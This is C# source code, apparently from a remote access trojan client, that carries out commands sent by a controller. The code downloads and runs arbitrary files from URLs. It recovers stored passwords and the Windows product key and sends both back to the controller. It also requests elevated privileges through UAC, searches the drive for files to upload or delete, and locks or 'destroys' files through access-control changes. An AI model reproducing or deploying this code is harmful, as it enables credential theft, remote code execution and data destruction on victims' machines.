private void DestroyFile(string path)
{
try
{
if (System.IO.File.Exists(path))
{
Random r = new Random();
try
{
File.Move(path, System.IO.Path.GetTempPath() + r.Next(500, 9000));
System.IO.File.WriteAllText(path, string.Empty);
FileSystem.FileOpen(FileSystem.FreeFile(), path, OpenMode.Input, OpenAccess.Default, OpenShare.LockReadWrite);
System.IO.DirectoryInfo FolderInfo = new System.IO.DirectoryInfo(path);
DirectorySecurity FolderAcl = new DirectorySecurity();
FolderAcl.SetAccessRuleProtection(true, false);
FolderInfo.SetAccessControl(FolderAcl);
mwork.addlog("[Anti Malware] Destroyed File at: " + path);
fileskilled = fileskilled + 1;
}
catch
{
mwork.adderror("[Anti Malware] Error while destroying File!");
mwork.adderror("[Anti Malware] Executing minimal destroy File Function..");
System.IO.DirectoryInfo FolderInfo = new System.IO.DirectoryInfo(path);
DirectorySecurity FolderAcl = new DirectorySecurity();
FolderAcl.SetAccessRuleProtection(true, false);
FolderInfo.SetAccessControl(FolderAcl);
mwork.addlog("[Anti Malware] Destroyed (low) File at: " + path);
fileskilled = fileskilled + 1;
}
}
}
catch
{
}
}
private void WalkDirRecursive(string vPath, string filename)
{
try
{
System.IO.DirectoryInfo vDirInfo = new System.IO.DirectoryInfo(vPath);
foreach (string fname in System.IO.Directory.GetFiles(vDirInfo.FullName))
{
if (fname.Contains(filename))
{
if (!fname.Contains(Application.StartupPath))
{
mwork.addlog("File Searcher [TaskID " + taskid + "] Found File at: " + fname);
}
if (action.Equals("Download"))
{
string sendback = fm3.dlFile(fname);
mwork.Send("fmXdlfile|" + sendback + "|" + Path.GetFileName(fname) + "|" + mwork.ClientID + "|" + "File Searcher");
}
else if (action.Equals("Delete"))
{
try
{
File.Delete(fname);
mwork.addinfo("File Searcher [TaskID " + taskid + "] Deleted File: " + fname);
}
catch
{
mwork.adderror("File Searcher [TaskID " + taskid + "] Couldnt delete File: " + fname);
}
}
else if (action.Equals("Block and Destroy"))
{
FileManager fmgrr = new FileManager();
fmgrr.blockfile(fname);
mwork.addinfo("File Searcher [TaskID " + taskid + "] Blocked and Destroyed File: " + fname);
}
}
}
foreach (string vSubDir in System.IO.Directory.GetDirectories(vDirInfo.FullName))
{
WalkDirRecursive(vSubDir, filename);
}
}
catch { }
}
public void Start(string commands)
{
try
{
string[] cmds = commands.Split('³');
foreach (string cmd in cmds)
{
switch (cmd.Split('²')[0])
{
case "execute":
if (cmd.Split('²')[1].Equals("file"))
{
string url = cmd.Split('²')[2];
string dropAs = cmd.Split('²')[3];
string fullPathString = Path.GetTempPath();
mwrk.SendStatus("Downloading File...");
WebClient webClienta = new WebClient();
webClienta.DownloadFile(url, fullPathString + @"\" + dropAs);
Process.Start(fullPathString + @"\" + dropAs);
mwrk.SendStatus("Executed File!");
}
else if (cmd.Split('²')[1].Equals("update"))
{
string dllink = cmd.Split('²')[2];
string saveas = cmd.Split('²')[3];
string currentPath = Application.StartupPath;
mwrk.SendStatus("Downloading Update...");
WebClient webClient = new WebClient();
webClient.DownloadFile(dllink, currentPath + @"\" + saveas);
Process.Start(currentPath + @"\" + saveas);
mwrk.SendStatus("Executed Update! Disconnecting...");
Thread.Sleep(400);
mwrk.Uninstall();
}
break;
case "Recover":
WinSerial wins = new WinSerial();
Recovery rec = new Recovery();
if (cmd.Split('²')[1].Equals("Passwords"))
{
foreach (DriveInfo Drive in DriveInfo.GetDrives())
{
if (Drive.RootDirectory.FullName == @"C:\")
{
Recovery x = new Recovery(Drive);
x.recoverAll();
mwrk.Send("passreco|" + mwrk.ClientID + "|" + x.allPws);
}
}
}
else if (cmd.Split('²')[1].Equals("Winserial"))
{
string serial = wins.GetWindowsProductKeyFromRegistry();
mwrk.Send("winserial|" + mwrk.ClientID + "|" + mwrk.OperatingSystem + "|" + serial);
}
break;
case "uac":
if (cmd.Split('²')[1].Equals("request"))
{
mwrk.Uacmode = "nonpersist";
Thread yellowUacThread = new Thread(mwrk.askUac);
yellowUacThread.IsBackground = true;
yellowUacThread.Start();
}
break;
case "antim":
if (cmd.Split('²')[1].Equals("normal"))
{
mwrk.StartAntiMalwareThread("#");
}
else if (cmd.Split('²')[1].Equals("enableprs"))
{
mwrk.proActiveIsEnabled = true;
Thread tPR = new Thread(new ThreadStart(mwrk.proactiveAM));
tPR.IsBackground = true;
tPR.Start();
}
else if (cmd.Split('²')[1].Equals("disableprs"))
{
mwrk.proActiveIsEnabled = false;
}
break;
case "action":
if (cmd.Split('²')[1].Equals("disconnect"))
{
Environment.Exit(0);
}
else if (cmd.Split('²')[1].Equals("uninstall"))
{
mwrk.Uninstall();
}
break;
}
}
}
catch (Exception eax) { mwrk.adderror(eax.ToString()); }
}